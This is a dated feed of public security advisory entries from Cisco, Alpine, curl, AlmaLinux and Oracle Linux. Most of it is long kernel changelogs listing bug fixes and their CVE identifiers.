11.09.2024 19:00:00 cisco [CISCO-SA-IOSXR-PONCTLR-CI-OHCHMSFL] Cisco Routed Passive Optical Network Controller Vulnerabilities (high) Multiple vulnerabilities in Cisco Routed Passive Optical Network (PON) Controller Software, which runs as a docker container on hardware that is supported by Cisco IOS XR Software, could allow an authenticated, remote attacker to perform command injection attacks, execute arbitrary commands on the affected system, or retrieve a cleartext password. For more information about these vulnerabilities, see the Details ["#details"] section of this advisory. Cisco plans to release software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is part of the September 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75416"]. https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXR-PONCTLR-CI-OHCHMSFL
11.09.2024 17:15:13 alpinelinux [ALPINE:CVE-2024-8636] qt6-qtwebengine vulnerability [From CVE-2024-8636] Heap buffer overflow in Skia in Google Chrome prior to 128.0.6613.137 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-8636
11.09.2024 13:15:02 alpinelinux [ALPINE:CVE-2024-8096] curl vulnerability [From CVE-2024-8096] When curl is told to use the Certificate Status Request TLS extension, often referred to as OCSP stapling, to verify that the server certificate is valid, it might fail to detect some OCSP problems and instead wrongly consider the response as fine. If the returned status reports another error than 'revoked' (like for example 'unauthorized') it is not treated as a bad certificate. https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-8096
11.09.2024 10:39:47 curl [CURL-CVE-2024-8096] OCSP stapling bypass with GnuTLS (medium) When curl is told to use the Certificate Status Request TLS extension, often referred to as OCSP stapling, to verify that the server certificate is valid, it might fail to detect some OCSP problems and instead wrongly consider the response as fine. If the returned status reports another error than "revoked" (like for example "unauthorized") it is not treated as a bad certificate. https://secdb.nttzen.cloud/security-advisory/curl/CURL-CVE-2024-8096
11.09.2024 12:50:16 almalinux [ALSA-2024:6569] 389-ds:1.4 security update (moderate) 389-ds:1.4 security update https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6569
11.09.2024 03:00:00oraclelinux[ELSA-2024-12610] Unbreakable Enterprise kernel security update (important)[5.4.17-2136.335.4]caches for x86_64. (Imran Khan) [Orabug: 36951041] - printk: add kthread for long-running print (Stephen Brennan) [Orabug: 36456582] - kdb: Use the passed prompt in kdb_position_cursor() (Douglas Anderson) - driver core: Fix uevent_show() vs driver detach race (Dan Williams) - pinctrl: ti: ti-iodelay: fix possible memory leak when pinctrl_enable() fails (Yang Yingliang) - pinctrl: ti: ti-iodelay: Drop if block with always false condition (Uwe Kleine-Konig) - pinctrl: single: fix possible memory leak when pinctrl_enable() fails (Yang Yingliang) - pinctrl: core: fix possible memory leak when pinctrl_enable() fails (Yang Yingliang) - ipvs: Avoid unnecessary calls to skb_is_gso_sctp (Ismael Luceno)[5.4.17-2136.335.3]- MIPS: Octeon: Add PCIe link status check (Dave Kleikamp) [Orabug: 36947196] {CVE-2024-40968}[5.4.17-2136.335.2]- drm/amdgpu: Fix signedness bug in sdma_v4_0_process_trap_irq() (Dan Carpenter) [Orabug: 36898075] {CVE-2024-41022}- net: relax socket state check at accept time. (Paolo Abeni) [Orabug: 36768889] {CVE-2024-36484}- fsnotify: clear PARENT_WATCHED flags lazily (Amir Goldstein) [Orabug: 36922241] - NFSD: Increase NFSD_MAX_OPS_PER_COMPOUND (Chuck Lever) [Orabug: 36908594] - x86/cpu: Avoid cpuinfo-induced IPI pileups (Paul E. 
McKenney) [Orabug: 35773811][5.4.17-2136.335.1]- LTS tag: v5.4.280 (Alok Tiwari) - i2c: rcar: bring hardware to known state when probing (Wolfram Sang) - nilfs2: fix kernel bug on rename operation of broken directory (Ryusuke Konishi) [Orabug: 36896821] {CVE-2024-41034}- tcp: avoid too many retransmit packets (Eric Dumazet) [Orabug: 36841816] {CVE-2024-41007}- tcp: use signed arithmetic in tcp_rtx_probe0_timed_out() (Eric Dumazet) - net: tcp: fix unexcepted socket die when snd_wnd is 0 (Menglong Dong) - tcp: refactor tcp_retransmit_timer() (Eric Dumazet) - SUNRPC: Fix RPC client cleaned up the freed pipefs dentries (felix) [Orabug: 36940547] {CVE-2023-52803}- libceph: fix race between delayed_work() and ceph_monc_stop() (Ilya Dryomov) [Orabug: 36930128] {CVE-2024-42232}- ALSA: hda/realtek: Limit mic boost on VAIO PRO PX (Edson Juliano Drosdeck) - nvmem: meson-efuse: Fix return value of nvmem callbacks (Joy Chakraborty) - hpet: Support 32-bit userspace (He Zhe) - USB: core: Fix duplicate endpoint bug by clearing reserved bits in the descriptor (Alan Stern) [Orabug: 36896826] {CVE-2024-41035}- usb: gadget: configfs: Prevent OOB read/write in usb_string_copy() (Lee Jones) [Orabug: 36930138] {CVE-2024-42236}- USB: Add USB_QUIRK_NO_SET_INTF quirk for START BP-850k (WangYuli) - USB: serial: option: add Rolling RW350-GL variants (Vanillan Wang) - USB: serial: option: add Netprisma LCUK54 series modules (Mank Wang) - USB: serial: option: add support for Foxconn T99W651 (Slark Xiao) - USB: serial: option: add Fibocom FM350-GL (Bjorn Mork) - USB: serial: option: add Telit FN912 rmnet compositions (Daniele Palmas) - USB: serial: option: add Telit generic core-dump composition (Daniele Palmas) - ARM: davinci: Convert comma to semicolon (Chen Ni) - s390: Mark psw in __load_psw_mask() as __unitialized (Sven Schnelle) - udp: Set SOCK_RCU_FREE earlier in udp_lib_get_port(). 
(Kuniyuki Iwashima) [Orabug: 36896842] {CVE-2024-41041}- ppp: reject claimed-as-LCP but actually malformed packets (Dmitry Antipov) [Orabug: 36896856] {CVE-2024-41044}- net: ethernet: lantiq_etop: fix double free in detach (Aleksander Jan Bajkowski) [Orabug: 36896863] {CVE-2024-41046}- net: lantiq_etop: add blank line after declaration (Aleksander Jan Bajkowski) - octeontx2-af: Fix incorrect value output on error path in rvu_check_rsrc_availability() (Aleksandr Mishin) - tcp: fix incorrect undo caused by DSACK of TLP retransmit (Neal Cardwell) - tcp: add TCP_INFO status for failed client TFO (Jason Baron) - vfs: don't mod negative dentry count when on shrinker list (Brian Foster) - fs/dcache: Re-use value stored to dentry->d_flags instead of re-reading (linke li) - filelock: fix potential use-after-free in posix_lock_inode (Jeff Layton) [Orabug: 36896877] {CVE-2024-41049}- nilfs2: fix incorrect inode allocation from reserved inodes (Ryusuke Konishi) - nvme-multipath: find NUMA path only for online numa-node (Nilay Shroff) - ALSA: hda/realtek: Enable headset mic of JP-IK LEAP W502 with ALC897 (Jian-Hong Pan) - i2c: pnx: Fix potential deadlock warning from del_timer_sync() call in isr (Piotr Wojtaszczyk) [Orabug: 36897909] {CVE-2024-42153}- media: dw2102: fix a potential buffer overflow (Mauro Carvalho Chehab) - bnx2x: Fix multiple UBSAN array-index-out-of-bounds (Ghadi Elie Rahme) [Orabug: 36897886] {CVE-2024-42148}- drm/amdgpu/atomfirmware: silence UBSAN warning (Alex Deucher) - drm/nouveau: fix null pointer dereference in nouveau_connector_get_modes (Ma Ke) [Orabug: 36897640] {CVE-2024-42101}- Revert 'mm/writeback: fix possible divide-by-zero in wb_dirty_limits(), again' (Jan Kara) - fsnotify: Do not generate events for O_PATH file descriptors (Jan Kara) - can: kvaser_usb: Explicitly initialize family in leafimx driver_info struct (Jimmy Assarsson) - mm: optimize the redundant loop of mm_update_owner_next() (Jinliang Zheng) - nilfs2: add missing check for inode 
numbers on directory entries (Ryusuke Konishi) [Orabug: 36897652] {CVE-2024-42104}- nilfs2: fix inode number range checks (Ryusuke Konishi) [Orabug: 36897658] {CVE-2024-42105}- inet_diag: Initialize pad field in struct inet_diag_req_v2 (Shigeru Yoshida) [Orabug: 36897666] {CVE-2024-42106}- selftests: make order checking verbose in msg_zerocopy selftest (Zijian Zhang) - selftests: fix OOM in msg_zerocopy selftest (Zijian Zhang) - bonding: Fix out-of-bounds read in bond_option_arp_ip_targets_set() (Sam Sun) [Orabug: 36825248] {CVE-2024-39487}- tcp_metrics: validate source addr length (Jakub Kicinski) [Orabug: 36897915] {CVE-2024-42154}- UPSTREAM: tcp: fix DSACK undo in fast recovery to call tcp_try_to_open() (Neal Cardwell) - net: tcp better handling of reordering then loss cases (Yuchung Cheng) - tcp: add ece_ack flag to reno sack functions (Yousuk Seung) - tcp: tcp_mark_head_lost is only valid for sack-tcp (zhang kai) - s390/pkey: Wipe sensitive data on failure (Holger Dengler) [Orabug: 36897934] {CVE-2024-42157}- jffs2: Fix potential illegal address access in jffs2_free_inode (Wang Yong) [Orabug: 36897696] {CVE-2024-42115}- powerpc/xmon: Check cpu id in commands 'c#', 'dp#' and 'dx#' (Greg Kurz) - orangefs: fix out-of-bounds fsid access (Mike Marshall) [Orabug: 36897837] {CVE-2024-42143}- powerpc/64: Set _IO_BASE to POISON_POINTER_DELTA not 0 for CONFIG_PCI=n (Michael Ellerman) - i2c: i801: Annotate apanel_addr as __ro_after_init (Heiner Kallweit) - media: dvb-frontends: tda10048: Fix integer overflow (Ricardo Ribalda) [Orabug: 36897976] {CVE-2024-42223}- media: s2255: Use refcount_t instead of atomic_t for num_channels (Ricardo Ribalda) - media: dvb-frontends: tda18271c2dd: Remove casting during div (Ricardo Ribalda) - net: dsa: mv88e6xxx: Correct check for empty list (Simon Horman) [Orabug: 36897982] {CVE-2024-42224}- Input: ff-core - prefer struct_size over open coded arithmetic (Erick Archer) - firmware: dmi: Stop decoding on broken entry (Jean Delvare) - 
sctp: prefer struct_size over open coded arithmetic (Erick Archer) - media: dw2102: Don't translate i2c read into write (Michael Bunk) - drm/amd/display: Skip finding free audio for unknown engine_id (Alex Hung) [Orabug: 36897726] {CVE-2024-42119}- drm/amdgpu: Initialize timestamp for some legacy SOCs (Ma Jun) - scsi: qedf: Make qedf_execute_tmf() non-preemptible (John Meneghini) [Orabug: 36897761] {CVE-2024-42124}- IB/core: Implement a limit on UMAD receive List (Michael Guralnik) [Orabug: 36897847] {CVE-2024-42145}- media: dvb-usb: dib0700_devices: Add missing release_firmware() (Ricardo Ribalda) - media: dvb: as102-fe: Fix as10x_register_addr packing (Ricardo Ribalda) - drm/lima: fix shared irq handling on driver remove (Erico Nunes) [Orabug: 36897779] {CVE-2024-42127}- LTS tag: v5.4.279 (Alok Tiwari) - arm64: dts: rockchip: Add sound-dai-cells for RK3368 (Alex Bee) - ARM: dts: rockchip: rk3066a: add #sound-dai-cells to hdmi node (Johan Jonker) - tcp: Fix data races around icsk->icsk_af_ops. (Kuniyuki Iwashima) [Orabug: 34719866] {CVE-2022-3566}- ipv6: Fix data races around sk->sk_prot. 
(Kuniyuki Iwashima) [Orabug: 34719906] {CVE-2022-3567}- ipv6: annotate some data-races around sk->sk_prot (Eric Dumazet) - nfs: Leave pages in the pagecache if readpage failed (Matthew Wilcox (Oracle)) - pwm: stm32: Refuse too small period requests (Uwe Kleine-Konig) - mtd: spinand: macronix: Add support for serial NAND flash (Jaime Liao) - ftruncate: pass a signed offset (Arnd Bergmann) [Orabug: 36897558] {CVE-2024-42084}- ata: libata-core: Fix double free on error (Niklas Cassel) [Orabug: 36897374] {CVE-2024-41087}- batman-adv: Don't accept TT entries for out-of-spec VIDs (Sven Eckelmann) - drm/nouveau/dispnv04: fix null pointer dereference in nv17_tv_get_hd_modes (Ma Ke) [Orabug: 36897380] {CVE-2024-41089}- drm/nouveau/dispnv04: fix null pointer dereference in nv17_tv_get_ld_modes (Ma Ke) [Orabug: 36897444] {CVE-2024-41095}- hexagon: fix fadvise64_64 calling conventions (Arnd Bergmann) - csky, hexagon: fix broken sys_sync_file_range (Arnd Bergmann) - net: can: j1939: enhanced error handling for tightly received RTS messages in xtp_rx_rts_session_new (Oleksij Rempel) - net: can: j1939: recover socket queue on CAN bus error during BAM transmission (Oleksij Rempel) - net: can: j1939: Initialize unused data in j1939_send_one() (Shigeru Yoshida) [Orabug: 36897516] {CVE-2024-42076}- tty: mcf: MCF54418 has 10 UARTS (Jean-Michel Hautbois) - usb: atm: cxacru: fix endpoint checking in cxacru_bind() (Nikita Zhandarovich) [Orabug: 36897451] {CVE-2024-41097}- usb: musb: da8xx: fix a resource leak in probe() (Dan Carpenter) - usb: gadget: printer: SS+ support (Oliver Neukum) - net: usb: ax88179_178a: improve link status logs (Jose Ignacio Tornos Martinez) - iio: chemical: bme680: Fix sensor data read operation (Vasileios Amoiridis) - iio: chemical: bme680: Fix overflows in compensate() functions (Vasileios Amoiridis) [Orabug: 36897566] {CVE-2024-42086}- iio: chemical: bme680: Fix calibration data variable (Vasileios Amoiridis) - iio: chemical: bme680: Fix pressure value 
output (Vasileios Amoiridis) - iio: adc: ad7266: Fix variable checking bug (Fernando Yang) - mmc: sdhci: Do not lock spinlock around mmc_gpio_get_ro() (Adrian Hunter) - mmc: sdhci: Do not invert write-protect twice (Adrian Hunter) - mmc: sdhci-pci: Convert PCIBIOS_* return codes to errnos (Ilpo Jarvinen) - x86: stop playing stack games in profile_pc() (Linus Torvalds) [Orabug: 36897616] {CVE-2024-42096}- gpio: davinci: Validate the obtained number of IRQs (Aleksandr Mishin) [Orabug: 36897599] {CVE-2024-42092}- nvme: fixup comment for nvme RDMA Provider Type (Hannes Reinecke) - soc: ti: wkup_m3_ipc: Send NULL dummy message instead of pointer message (Andrew Davis) - media: dvbdev: Initialize sbuf (Ricardo Ribalda) - ALSA: emux: improve patch ioctl data validation (Oswald Buddenhagen) [Orabug: 36897624] {CVE-2024-42097}- net/dpaa2: Avoid explicit cpumask var allocation on stack (Dawei Li) [Orabug: 36897602] {CVE-2024-42093}- net/iucv: Avoid explicit cpumask var allocation on stack (Dawei Li) [Orabug: 36897608] {CVE-2024-42094}- mtd: partitions: redboot: Added conversion of operands to a larger type (Denis Arefev) - drm/panel: ilitek-ili9881c: Fix warning with GPIO controllers that sleep (Laurent Pinchart) [Orabug: 36897570] {CVE-2024-42087}- netfilter: nf_tables: fully validate NFT_DATA_VALUE on store to data registers (Pablo Neira Ayuso) [Orabug: 36897500] {CVE-2024-42070}- parisc: use correct compat recv/recvfrom syscalls (Arnd Bergmann) - sparc: fix old compat_sys_select() (Arnd Bergmann) - net: phy: micrel: add Microchip KSZ 9477 to the device table (Enguerrand de Ribaucourt) - net: phy: mchp: Add support for LAN8814 QUAD PHY (Divya Koppera) - net: dsa: microchip: fix initial port flush problem (Tristram Ha) - ASoC: fsl-asoc-card: set priv->pdev before using it (Elinor Montmasson) [Orabug: 36897578] {CVE-2024-42089}- netfilter: nf_tables: validate family when identifying table via handle (Pablo Neira Ayuso) - drm/amdgpu: fix UBSAN warning in kv_dpm.c (Alex 
Deucher) [Orabug: 36835992] {CVE-2024-40987}
- pinctrl: rockchip: fix pinmux reset in rockchip_pmx_set (Huang-Huang Bao)
- pinctrl: rockchip: fix pinmux bits for RK3328 GPIO3-B pins (Huang-Huang Bao)
- pinctrl: rockchip: fix pinmux bits for RK3328 GPIO2-B pins (Huang-Huang Bao)
- pinctrl: fix deadlock in create_pinctrl() when handling -EPROBE_DEFER (Hagar Hemdan) [Orabug: 36897586] {CVE-2024-42090}
- iio: dac: ad5592r: fix temperature channel scaling value (Marc Ferland)
- iio: dac: ad5592r: un-indent code-block for scale read (Alexandru Ardelean)
- iio: dac: ad5592r-base: Replace indio_dev->mlock with own device lock (Sergiu Cuciurean)
- x86/amd_nb: Check for invalid SMN reads (Yazen Ghannam)
- PCI: Add PCI_ERROR_RESPONSE and related definitions (Naveen Naidu)
- perf/core: Fix missing wakeup when waiting for context reference (Haifeng Xu)
- tracing: Add MODULE_DESCRIPTION() to preemptirq_delay_test (Jeff Johnson)
- arm64: dts: qcom: qcs404: fix bluetooth device address (Johan Hovold)
- ARM: dts: samsung: smdk4412: fix keypad no-autorepeat (Krzysztof Kozlowski)
- ARM: dts: samsung: exynos4412-origen: fix keypad no-autorepeat (Krzysztof Kozlowski)
- ARM: dts: samsung: smdkv310: fix keypad no-autorepeat (Krzysztof Kozlowski)
- i2c: ocores: set IACK bit after core is enabled (Grygorii Tertychnyi)
- gcov: add support for GCC 14 (Peter Oberparleiter)
- drm/radeon: fix UBSAN warning in kv_dpm.c (Alex Deucher) [Orabug: 36835997] {CVE-2024-40988}
- ACPICA: Revert 'ACPICA: avoid Info: mapping multiple BARs. Your kernel is fine.' (Raju Rangoju)
- dmaengine: ioatdma: Fix missing kmem_cache_destroy() (Nikita Shubin)
- regulator: core: Fix modpost error 'regulator_get_regmap' undefined (Biju Das)
- net: usb: rtl8150 fix unintiatilzed variables in rtl8150_get_link_ksettings (Oliver Neukum)
- netfilter: ipset: Fix suspicious rcu_dereference_protected() (Jozsef Kadlecsik) [Orabug: 36838634] {CVE-2024-40993}
- virtio_net: checksum offloading handling fix (Heng Qi)
- net/sched: act_api: fix possible infinite loop in tcf_idr_check_alloc() (David Ruth) [Orabug: 36836019] {CVE-2024-40995}
- net/sched: act_api: rely on rcu in tcf_idr_check_alloc (Pedro Tammela)
- netns: Make get_net_ns() handle zero refcount net (Yue Haibing) [Orabug: 36835849] {CVE-2024-40958}
- xfrm6: check ip6_dst_idev() return value in xfrm6_get_saddr() (Eric Dumazet) [Orabug: 36835852] {CVE-2024-40959}
- ipv6: prevent possible NULL dereference in rt6_probe() (Eric Dumazet) [Orabug: 36835857] {CVE-2024-40960}
- ipv6: prevent possible NULL deref in fib6_nh_init() (Eric Dumazet) [Orabug: 36835862] {CVE-2024-40961}
- netrom: Fix a memory leak in nr_heartbeat_expiry() (Gavrilov Ilia) [Orabug: 36836086] {CVE-2024-41006}
- cipso: fix total option length computation (Ondrej Mosnacek)
- mips: bmips: BCM6358: make sure CBR is correctly set (Christian Marangi) [Orabug: 36835870] {CVE-2024-40963}
- MIPS: Routerboard 532: Fix vendor retry check code (Ilpo Jarvinen)
- PCI/PM: Avoid D3cold for HP Pavilion 17 PC/1972 PCIe Ports (Mario Limonciello)
- udf: udftime: prevent overflow in udf_disk_stamp_to_time() (Roman Smirnov)
- usb: misc: uss720: check for incompatible versions of the Belkin F5U002 (Alex Henrie)
- powerpc/io: Avoid clang null pointer arithmetic warnings (Michael Ellerman)
- powerpc/pseries: Enforce hcall result buffer validity and size (Nathan Lynch) [Orabug: 36835926] {CVE-2024-40974}
- Bluetooth: ath3k: Fix multiple issues reported by checkpatch.pl (Uri Arev)
- scsi: qedi: Fix crash while reading debugfs attribute (Manish Rangankar) [Orabug: 36835947] {CVE-2024-40978}
- drop_monitor: replace spin_lock by raw_spin_lock (Wander Lairson Costa) [Orabug: 36835960] {CVE-2024-40980}
- batman-adv: bypass empty buckets in batadv_purge_orig_ref() (Eric Dumazet) [Orabug: 36835966] {CVE-2024-40981}
- selftests/bpf: Prevent client connect before server bind in test_tc_tunnel.sh (Alessandro Carminati (Red Hat))
- rcutorture: Fix rcu_torture_one_read() pipe_count overflow comment (Paul E. McKenney)
- i2c: at91: Fix the functionality flags of the slave-only interface (Jean Delvare)
- usb-storage: alauda: Check whether the media is initialized (Shichao Lai) [Orabug: 36753734] {CVE-2024-38619}
- greybus: Fix use-after-free bug in gb_interface_release due to race condition. (Sicong Huang) [Orabug: 36835564] {CVE-2024-39495}
- netfilter: nftables: exthdr: fix 4-byte stack OOB write (Florian Westphal) [Orabug: 35814445] {CVE-2023-4881} {CVE-2023-52628}
- hugetlb_encode.h: fix undefined behaviour (34 << 26) (Matthias Goergens)
- tick/nohz_full: Don't abuse smp_call_function_single() in tick_setup_device() (Oleg Nesterov)
- nilfs2: fix potential kernel bug due to lack of writeback flag waiting (Ryusuke Konishi) [Orabug: 36774571] {CVE-2024-37078}
- intel_th: pci: Add Lunar Lake support (Alexander Shishkin)
- intel_th: pci: Add Meteor Lake-S support (Alexander Shishkin)
- intel_th: pci: Add Sapphire Rapids SOC support (Alexander Shishkin)
- intel_th: pci: Add Granite Rapids SOC support (Alexander Shishkin)
- intel_th: pci: Add Granite Rapids support (Alexander Shishkin)
- dmaengine: axi-dmac: fix possible race in remove() (Nuno Sa)
- PCI: rockchip-ep: Remove wrong mask on subsys_vendor_id (Rick Wertenbroek)
- ocfs2: fix races between hole punching and AIO+DIO (Su Yue) [Orabug: 36835817] {CVE-2024-40943}
- ocfs2: use coarse time for new created files (Su Yue)
- fs/proc: fix softlockup in __read_vmcore (Rik van Riel)
- vmci: prevent speculation leaks by sanitizing event in event_deliver() (Hagar Gamal Halim Hemdan) [Orabug: 36835582] {CVE-2024-39499}
- tracing/selftests: Fix kprobe event name test for .isra. functions (Steven Rostedt (Google))
- drm/exynos/vidi: fix memory leak in .get_modes() (Jani Nikula) [Orabug: 36835786] {CVE-2024-40932}
- drivers: core: synchronize really_probe() and dev_uevent() (Dirk Behme) [Orabug: 36835589] {CVE-2024-39501}
- ionic: fix use after netif_napi_del() (Taehee Yoo) [Orabug: 36835595] {CVE-2024-39502}
- net/ipv6: Fix the RT cache flush via sysctl using a previous delay (Petr Pavlu)
- net/mlx5e: Fix features validation check for tunneled UDP (non-VXLAN) packets (Gal Pressman)
- tcp: fix race in tcp_v6_syn_recv_sock() (Eric Dumazet)
- drm/bridge/panel: Fix runtime warning on panel bridge release (Adam Miotk)
- drm/komeda: check for error-valued pointer (Amjad Ouled-Ameur) [Orabug: 36835674] {CVE-2024-39505}
- liquidio: Adjust a NULL pointer handling path in lio_vf_rep_copy_packet (Aleksandr Mishin) [Orabug: 36835677] {CVE-2024-39506}
- HID: logitech-dj: Fix memory leak in logi_dj_recv_switch_to_dj_mode() (Jose Exposito) [Orabug: 36835793] {CVE-2024-40934}
- iommu: Return right value in iommu_sva_bind_device() (Lu Baolu) [Orabug: 36835824] {CVE-2024-40945}
- iommu/amd: Fix sysfs leak in iommu init (Kun(llfl))
- HID: core: remove unnecessary WARN_ON() in implement() (Nikita Zhandarovich) [Orabug: 36835689] {CVE-2024-39509}
- gpio: tqmx86: fix typo in Kconfig label (Gregor Herburger)
- SUNRPC: return proper error from gss_wrap_req_priv (Chen Hanxiao)
- Input: try trimming too long modalias strings (Dmitry Torokhov)
- scsi: mpt3sas: Avoid test/set_bit() operating in non-allocated memory (Breno Leitao) [Orabug: 36835696] {CVE-2024-40901}
- xhci: Apply broken streams quirk to Etron EJ188 xHCI host (Kuangyi Chiang)
- xhci: Apply reset resume quirk to Etron EJ188 xHCI host (Kuangyi Chiang)
- xhci: Set correct transferred length for cancelled bulk transfers (Mathias Nyman)
- jfs: xattr: fix buffer overflow for invalid xattr (Greg Kroah-Hartman) [Orabug: 36835701] {CVE-2024-40902}
- mei: me: release irq in mei_me_pci_resume error path (Tomas Winkler)
- USB: class: cdc-wdm: Fix CPU lockup caused by excessive log messages (Alan Stern) [Orabug: 36835709] {CVE-2024-40904}
- nilfs2: fix nilfs_empty_dir() misjudgment and long loop on I/O errors (Ryusuke Konishi) [Orabug: 36774647] {CVE-2024-39469}
- nilfs2: return the mapped address from nilfs_get_page() (Matthew Wilcox (Oracle))
- nilfs2: Remove check for PageError (Matthew Wilcox (Oracle))
- selftests/mm: compaction_test: fix bogus test success on Aarch64 (Dev Jain)
- selftests/mm: conform test to TAP format output (Muhammad Usama Anjum)
- selftests/mm: compaction_test: fix incorrect write of zero to nr_hugepages (Dev Jain)
- serial: sc16is7xx: fix bug in sc16is7xx_set_baud() when using prescaler (Hugo Villeneuve)
- serial: sc16is7xx: replace hardcoded divisor value with BIT() macro (Hugo Villeneuve)
- drm/amd/display: Handle Y carry-over in VCP X.Y calculation (George Shen)
- ASoC: ti: davinci-mcasp: Fix race condition during probe (Joao Paulo Goncalves)
- ASoC: ti: davinci-mcasp: Handle missing required DT properties (Peter Ujfalusi)
- ASoC: ti: davinci-mcasp: Simplify the configuration parameter handling (Peter Ujfalusi)
- ASoC: ti: davinci-mcasp: Remove legacy dma_request parsing (Peter Ujfalusi)
- ASoC: ti: davinci-mcasp: Use platform_get_irq_byname_optional (Peter Ujfalusi)
- ASoC: ti: davinci-mcasp: remove always zero of davinci_mcasp_get_dt_params (Zhang Qilong)
- ASoC: ti: davinci-mcasp: remove redundant assignment to variable ret (Colin Ian King)
- usb: gadget: f_fs: Fix race between aio_cancel() and AIO request complete (Wesley Cheng) [Orabug: 36683255] {CVE-2024-36894}
- ipv6: fix possible race in __fib6_drop_pcpu_from() (Eric Dumazet) [Orabug: 36835716] {CVE-2024-40905}
- af_unix: Annotate data-race of sk->sk_shutdown in sk_diag_fill(). (Kuniyuki Iwashima)
- af_unix: Use skb_queue_len_lockless() in sk_diag_show_rqlen(). (Kuniyuki Iwashima)
- af_unix: Use unix_recvq_full_lockless() in unix_stream_connect(). (Kuniyuki Iwashima)
- af_unix: Annotate data-race of net->unx.sysctl_max_dgram_qlen. (Kuniyuki Iwashima)
- af_unix: Annotate data-races around sk->sk_state in UNIX_DIAG. (Kuniyuki Iwashima)
- af_unix: Annotate data-races around sk->sk_state in sendmsg() and recvmsg(). (Kuniyuki Iwashima)
- af_unix: Annotate data-races around sk->sk_state in unix_write_space() and poll(). (Kuniyuki Iwashima)
- af_unix: Annotate data-race of sk->sk_state in unix_inq_len(). (Kuniyuki Iwashima)
- ptp: Fix error message on failed pin verification (Karol Kolacinski)
- net/sched: taprio: always validate TCA_TAPRIO_ATTR_PRIOMAP (Eric Dumazet) [Orabug: 36748169] {CVE-2024-36974}
- tcp: count CLOSE-WAIT sockets for TCP_MIB_CURRESTAB (Jason Xing)
- net: sched: sch_multiq: fix possible OOB write in multiq_tune() (Hangyu Hua) [Orabug: 36748177] {CVE-2024-36978}
- ipv6: sr: block BH in seg6_output_core() and seg6_input_core() (Eric Dumazet)
- wifi: iwlwifi: mvm: don't read past the mfuart notifcation (Emmanuel Grumbach) [Orabug: 36835808] {CVE-2024-40941}
- wifi: iwlwifi: dbg_ini: move iwl_dbg_tlv_free outside of debugfs ifdef (Shahar S Matityahu)
- wifi: iwlwifi: mvm: revert gen2 TX A-MPDU size to 64 (Johannes Berg)
- wifi: cfg80211: pmsr: use correct nla_get_uX functions (Lin Ma)
- wifi: mac80211: Fix deadlock in ieee80211_sta_ps_deliver_wakeup() (Remi Pommarel) [Orabug: 36835735] {CVE-2024-40912}
- wifi: mac80211: mesh: Fix leak of mesh_preq_queue objects (Nicolas Escande) [Orabug: 36835812] {CVE-2024-40942}
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12610
11.09.2024 03:00:00 oraclelinux [ELSA-2024-12611] Unbreakable Enterprise kernel security update (important)
[4.14.35-2047.540.4.1]
- Revert 'selftests/kcmp: Make the test output consistent and clear' (Samasth Norway Ananda) [Orabug: 37029311]
[4.14.35-2047.540.4]
- kdb: Use the passed prompt in kdb_position_cursor() (Douglas Anderson)
- ipvs: Avoid unnecessary calls to skb_is_gso_sctp (Ismael Luceno)
- printk: add kthread for long-running print (Stephen Brennan) [Orabug: 36208661]
[4.14.35-2047.540.3]
- MIPS: Octeon: Add PCIe link status check (Dave Kleikamp) [Orabug: 36952386] {CVE-2024-40968}
[4.14.35-2047.540.2]
- fsnotify: clear PARENT_WATCHED flags lazily (Amir Goldstein) [Orabug: 36922242]
- cifs: fix panic in smb2_reconnect (Ronnie Sahlberg) [Orabug: 36314494]
- cifs: convert cifs_put_smb_ses from static to global (Dai Ngo) [Orabug: 36314494]
- net: relax socket state check at accept time. (Paolo Abeni) [Orabug: 36768890] {CVE-2024-36484}
[4.14.35-2047.540.1]
- x86/cpu: Avoid cpuinfo-induced IPI pileups (Paul E. McKenney) [Orabug: 35773812]
- LTS version v4.14.349 (Yifei Liu)
- x86/kvm: Disable all PV features on crash (Vitaly Kuznetsov)
- x86/kvm: Disable kvmclock on all CPUs on shutdown (Vitaly Kuznetsov)
- x86/kvm: Teardown PV features on boot CPU as well (Vitaly Kuznetsov)
- nfs: fix undefined behavior in nfs_block_bits() (Sergey Shtylyov)
- ext4: fix mb_cache_entry's e_refcnt leak in ext4_xattr_block_cache_find() (Baokun Li) [Orabug: 36774600] {CVE-2024-39276}
- sparc: move struct termio to asm/termios.h (Mike Gilbert)
- kdb: Use format-specifiers rather than memset() for padding in kdb_read() (Daniel Thompson)
- kdb: Merge identical case statements in kdb_read() (Daniel Thompson)
- kdb: Fix console handling when editing and tab-completing commands (Daniel Thompson)
- kdb: Use format-strings rather than '
- kdb: Fix buffer overflow during tab-complete (Daniel Thompson) [Orabug: 36809289] {CVE-2024-39480}
- sparc64: Fix number of online CPUs (Sam Ravnborg)
- intel_th: pci: Add Meteor Lake-S CPU support (Alexander Shishkin)
- net/9p: fix uninit-value in p9_client_rpc() (Nikita Zhandarovich) [Orabug: 36774613] {CVE-2024-39301}
- KVM: arm64: Allow AArch32 PSTATE.M to be restored as System mode (Marc Zyngier)
- netfilter: nft_dynset: relax superfluous check on set updates (Pablo Neira Ayuso)
- netfilter: nft_dynset: report EOPNOTSUPP on missing set feature (Pablo Neira Ayuso)
- netfilter: nf_tables: don't skip expired elements during walk (Pablo Neira Ayuso)
- netfilter: nf_tables: drop map element references from preparation phase (Pablo Neira Ayuso)
- netfilter: nf_tables: pass ctx to nf_tables_expr_destroy() (Pablo Neira Ayuso)
- netfilter: nftables: rename set element data activation/deactivation functions (Pablo Neira Ayuso)
- netfilter: nf_tables: pass context to nft_set_destroy() (Pablo Neira Ayuso)
- netfilter: nf_tables: fix set double-free in abort path (Pablo Neira Ayuso)
- netfilter: nf_tables: add nft_set_is_anonymous() helper (Pablo Neira Ayuso)
- fbdev: savage: Handle err return when savagefb_check_var failed (Cai Xinchen) [Orabug: 36809265] {CVE-2024-39475}
- media: v4l2-core: hold videodev_lock until dev reg, finishes (Hans Verkuil)
